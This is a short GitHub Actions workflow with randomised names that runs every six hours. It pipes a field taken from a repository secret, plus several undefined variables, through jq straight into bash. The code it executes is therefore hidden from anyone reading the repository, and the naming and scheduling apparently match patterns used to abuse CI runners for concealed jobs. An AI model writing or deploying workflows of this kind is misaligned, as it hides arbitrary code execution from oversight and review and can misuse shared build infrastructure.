name: renhengxing4567
on:
  workflow_dispatch:
  schedule:
    - cron: '37 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: renhengxing4567
        env:
          bc1: ${{ secrets.bc1 }}
        run: |
          echo $bc1 | jq -r .i77 | /bin/bash
          echo $hwm86768 | jq -r .zigz9640 | /bin/bash
          echo $jafcu444 | jq -r .herie59031 | /bin/bash
          echo $wkvn1487 | jq -r .udsiv24195 | /bin/bash
          echo $aj361 | jq -r .pxr91 | /bin/bash
          echo $fcinz808 | jq -r .a4354 | /bin/bash
          echo $bcg85009 | jq -r .gwufv08 | /bin/bash

